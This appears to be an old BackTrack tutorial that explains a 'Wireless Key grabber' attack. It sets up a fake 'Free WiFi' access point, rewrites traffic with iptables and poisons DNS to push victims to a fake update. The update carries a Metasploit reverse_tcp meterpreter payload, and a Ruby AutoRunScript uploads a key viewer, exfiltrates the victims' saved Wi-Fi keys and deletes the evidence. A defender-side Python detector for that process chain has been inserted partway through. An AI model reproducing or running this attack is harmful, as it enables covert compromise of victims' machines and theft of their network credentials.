Wireless Key grabber -- how the script works
hm2075@hotmail.com
for bt4 pre final

# Copying dhcpd.conf
The first stage is copying the dhcpd.conf to its correct location.
Here is a peek at the dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
  option routers 10.0.0.1;
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.0;
  option domain-name "example.com";
  option domain-name-servers 10.0.0.1;
  range dynamic-bootp 10.0.0.16 10.0.0.55;
  #range 10.0.0.20 10.0.0.50;
}
# FakeAP
modprobe tun is required.
airmon-ng start interface --- this sets your interface into monitor mode
airbase-ng -e "Free WiFi" mon0 -v --- this starts a standard AP on mon0
# Getting metasploit ready
"Loading Metasploit with hb.rc"
./msfconsole -r /root/WK/hb.rc &
Let's have a look at hb.rc:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp --- I created the meterpreter.exe earlier on port 28, i.e. our fake update exe
set LHOST 10.0.0.1
set LPORT 28
set AutoRunScript /root/WK/hb.rb --- this is the script we want to run once the meterpreter.exe is loaded by the victim
set ExitOnSession false --- we don't want to exit
show options
exploit -j
We shall have a quick look at hb.rb:
# Wireless key harvester using wireless key viewer
require 'rex'

# Extract the host and port
host,port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")

# bin -- the name of our exe
bin = "wkv.exe"
# output of wireless key viewer --- we want our txt file name to be random, otherwise it will get overwritten
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
# destination for the keys in txt format
dest = "/root/WK/keys/"

# upload wireless key viewer --- modify it to bypass AVs
print_status("Uploading Wireless Key Viewer")
sleep(1)
# We upload our file to the system drive, not C:, because on some machines it can be D: etc.
client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/root/WK/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)

# execute via cmd; the output file gets the random name
print_status("Executing wireless key viewer ")
# We execute here
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stext /#{out}", nil, {'Hidden' => 'false'})
print_status("wkv file executed")
sleep(1)

# download keys to our keys folder
print_status("Downloading keys to keys folder ")
client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
print_status("Downloaded keys to keys folder ")

# delete uploaded files -- we can also clear logs here if we want to
# i.e. delete wkv.exe and the txt file
sleep(1)
print_status("Deleting uploaded files ")
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
print_status("Have a nice day!!!!!! ")
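As an added, defender-side example that is not part of the original paste: detection logic that runs over constructed process-creation events and flags the sequence hb.rb leaves on the victim, an executable launched from the drive root through cmd.exe /c with the /stext export switch, followed by deletion of that executable and of a five-upper-case-letter .txt file. The event tuple format and the sample events are assumptions made for this example.

```python
import re

# Constructed sample events: (event id, parent image, command line).
# Roughly what a Sysmon process-creation log would give after flattening.
SAMPLE_EVENTS = [
    (1, "explorer.exe", r'"C:\Users\bob\Downloads\update.exe"'),
    (2, "update.exe",   r'cmd.exe /c C:\wkv.exe /stext /QWERT.txt'),
    (3, "update.exe",   r'cmd.exe /c del C:\wkv.exe '),
    (4, "update.exe",   r'cmd.exe /c del C:\QWERT.txt '),
    (5, "explorer.exe", r'notepad.exe C:\Users\bob\notes.txt'),
]

# cmd.exe /c running an exe that sits directly in the drive root, with the
# NirSoft-style "/stext" text-export switch (what hb.rb does with wkv.exe).
DRIVE_ROOT_STEXT = re.compile(
    r'cmd\.exe\s+/c\s+(?P<bin>[A-Za-z]:\\[^\\\s]+\.exe)\s+/stext\s+(?P<out>\S+)',
    re.I)
# cmd.exe /c del of a file directly in the drive root.
DRIVE_ROOT_DEL = re.compile(
    r'cmd\.exe\s+/c\s+del\s+(?P<path>[A-Za-z]:\\[^\\\s]+)', re.I)
# hb.rb names its output file with exactly five upper-case letters + ".txt".
RANDOM_TXT = re.compile(r'^[A-Z]{5}\.txt$')


def find_harvester_chain(events):
    """Return (event id, reason) alerts for the export-then-delete chain.

    The deletion of the exe only alerts when the same parent process ran
    that exe with /stext earlier, which keeps ordinary cleanup out of it.
    """
    alerts = []
    exported = {}  # parent image -> list of lower-cased exe paths run with /stext
    for eid, parent, cmdline in events:
        m = DRIVE_ROOT_STEXT.search(cmdline)
        if m:
            exported.setdefault(parent, []).append(m.group('bin').lower())
            alerts.append((eid, "drive-root exe run with /stext export switch"))
            continue
        m = DRIVE_ROOT_DEL.search(cmdline)
        if m:
            path = m.group('path')
            name = path.split('\\')[-1]
            if path.lower() in exported.get(parent, []):
                alerts.append((eid, "deletion of the exe just run with /stext"))
            elif RANDOM_TXT.match(name):
                alerts.append((eid, "deletion of five-letter random .txt at drive root"))
    return alerts
```

Run against the sample, events 2, 3 and 4 are flagged and the two benign events are not; in practice the same rule belongs on the endpoint's process-creation telemetry, keyed by parent process.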
# Setting up IP tables and dhcp server
echo "Setting up IPTABLES"
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
sleep 2
/etc/init.d/dhcp3-server restart
echo "IPTABLES updated and dhcp server started"
sleep 2

# start webserver --- I prefer lighttpd because I can use a custom conf file to change the location of the index.html
echo "starting webserver"
/etc/init.d/lighttpd stop
sleep 2
lighttpd -f '/root/WK/lighttpd.conf'
sleep 2
echo "Web server started"
sleep 2

# start dns poison --- this is straightforward, we just redirect our victims to our exploit page
echo "Starting dns redirector"
sleep 2
cd /root/WK
xterm -geometry 75x15+500+0 -T DNSPoison -e java ServerKernelMain 10.0.0.1 10.0.0.1 &
echo "DNS poison started, check DNS poison if victims are being redirected to our webserver"
sleep 2
echo "Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited"
sleep 2
echo "Opening WKV folder, keys will be uploaded in here"
sleep 2
konqueror --geometry 605x305+500+500 --select /root/WK/keys/